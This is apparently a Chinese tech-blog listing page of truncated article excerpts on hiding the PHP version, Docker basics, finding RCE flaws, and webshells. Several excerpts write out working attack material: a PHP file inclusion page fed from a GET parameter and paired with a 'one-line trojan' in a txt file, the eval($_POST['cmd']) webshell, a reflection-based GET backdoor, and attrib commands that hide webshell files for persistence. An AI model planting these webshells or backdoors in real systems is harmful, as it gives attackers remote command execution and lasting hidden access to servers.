隐藏PHP 版本修改:php.iniexpose_php = On改成expose_php = Off重启apache或者Nginx后,php版本在http头中隐藏了。cd /application/php/lib/sed -n '/expose_php/p' php.inised -i 's/expose_php = On/expose_php = Off/g' php.inised -n '/
原创 2015-09-24 11:13:59
873阅读
Docker 概述Docker 概念Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。Docker的历史在2010年,几个大胡子年轻人从美国知名创业孵化器Y Combinator毕业后,在旧金山成立了一家做PaaS 平台
转载 2024-10-25 11:22:16
58阅读
首先建立一PHP文件test.php 文件内容为:    $test=$_GET['test'];  @include 'test/'.$test;  ?>     Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问[url]http://localhost/test/test.ph
原创 2006-08-17 02:45:00
1769阅读
  远程代码执行(RCE)ld如同潜伏在代码深处的致命陷阱,gj者借此完全掌控服务器,本文以真实案例为蓝本,揭示挖掘隐藏RCEld的完整技术路径。  一、RCEld的藏匿之地与危害本质  RCEld允许gj者在目标服务器直接执行操作系统命令,其危害程度远超普通ld,服务器控制权一旦沦陷,数据泄露、服务中断等连锁反应接踵而至。PHP开发因其灵活性,代码中常埋藏危险函数调用点,当用户输入未经严格过滤便
原创 3月前
43阅读
array_test.php:<?php //对于同一个界面中有多个表单要提交的情况,可以利用隐藏控件对所提交
原创 2023-03-04 07:49:15
23阅读
还可以把你在使用PHP 来驱动网站的这一事实隐藏起来,或者至少不那么明显。使用expose_php指令就能避免将php版本信息追加到Web 服务器签名的最后。不允许访问phpinfo()可以防止攻击者得到你的软件版本号和其他重要信息。通过改变文档扩展名,使得这些页面映射到PHP 脚本不容易被看出来。 1.expose_php=On|Off 作用域:PHP_INI_SYSTEM;默认值:
转载 2024-03-26 16:53:17
75阅读
服务器反馈出apache 和php版本是非常危险的,具体怎么危险自己想吧。 方法很简单: Apache: 开启 httpd.conf,加入以下两行: ServerTokens ProductOnly ServerSignature Off PHP:隐藏 PHP 版本就是隐藏 "X-Powered-By: P
原创 2012-11-23 15:41:46
389阅读
一句话 and 大马 phpspy  菜刀一句话<?php@eval($_POST['cmd']);?>反射后门<?php   $func = new ReflectionFunction($_GET[m]);   echo $func->invokeArgs(array($_GET[c]));
原创 2015-08-25 10:33:02
10000+阅读
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意
原创 2023-03-01 15:13:16
219阅读
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。 1、隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 attrib +s
原创 2023-05-17 09:36:52
209阅读
禁止查看网页源代码的几种稍微繁琐方法:1.把网页嵌在一个框架中(即设置中间跳转页面)2.使用类似batch html encryptor工具加密源文件3.使用js脚本语言写页面(即用js代码测dom节点写)下面这个是我自己网站屏蔽被盗源码的js代码,这样可以有效的防止小白偷看源码,内行或者大神就不一定防的住了(谷歌,IE,搜狗,360,右键和按键打开菜单栏失效,即查看不了元素,火狐下--屏蔽右键和
转载 2023-07-11 11:12:40
13阅读
Python 多好用不用多说,大家看看自己用的语言就知道了。但是 Python 隐藏的高级功能你都 get 了吗?本文中,列举了 Python 中五种略高级的特征以及它们的使用方法,快来一探究竟吧! Python 是一种美丽的语言,它简单易用却非常强大。但你真的会用 Python 的所有功能吗? 任何编程语言的高级特征通常都是通过大量的使用经验才发现的。比如你在编写一个复杂
 代码:  <? $file_name = "info_check.exe"; $file_dir = "/public/www/download/"; //检查文
原创 2011-01-22 04:09:21
122阅读
代码: test.php <img src="test3.php?path=file/118812060.jpg"> <br>this is test! test3.php <?php$path=$_GET["path"];$cacheimgname=str_replace("/","_",$path);$loc
原创 2010-12-16 04:43:39
109阅读
http://yfyfj.blog.163.com/blog/static/1542478420111122914470/一、apache apache 的httpd.conf 有两个配置可以控制是否显示服务器信...
转载 2022-05-03 15:38:59
553阅读
1点赞
中文截取
转载 2019-01-01 21:24:00
61阅读
2评论
author:咔咔location / { if (!-e $request_filename){ rewrite ^/(.*)$ /index.php/$1 last; break; }}
原创 2019-05-14 14:26:15
261阅读
 1、生成器执行时间的差异array = [1, 8, 15] g = (x for x in array if array.count(x) > 0) array = [2, 8, 22]输出:>>> print(list(g)) [8]原因:在一个生成器表达式里,in的操作是在声明时求值的,而if是在运行期求值的。所以在运行期之前,array已经被重新分配成了
nginx 通过 location 的规则匹配将 php 转发给 php-fpm 处理后获取结果然后返回给客户端,转发模式可以通过 unix sock 或 tcp socket 方式。百度了好多文章我是没遇到一个能完整的而且正确的把 nginx 和 php 结合的配置讲述的较为正确的,这里总结了下最基本的 nginx + php 的模式配置,以及隐藏 index.php 和 开启 pathinfo
转载 2024-03-18 17:47:28
73阅读
刚刚在首页看到李老师的[为JavaScript程序添加客户端不可见的注释],突然想起很久前想过在客户端隐藏脚本的一个方法.在这里给大家一个思路吧. 刚刚在首页看到李老师的[为JavaScript程序添加客户端不可见的注释],突然想起很久前想过在客户端隐藏脚本的一个方法.在这里给大家一个思路吧. 不过如果想要在已有的项目中使用这个方法,可能要修改你现有的
转载 2023-07-02 22:50:11
123阅读
  • 1
  • 2
  • 3
  • 4
  • 5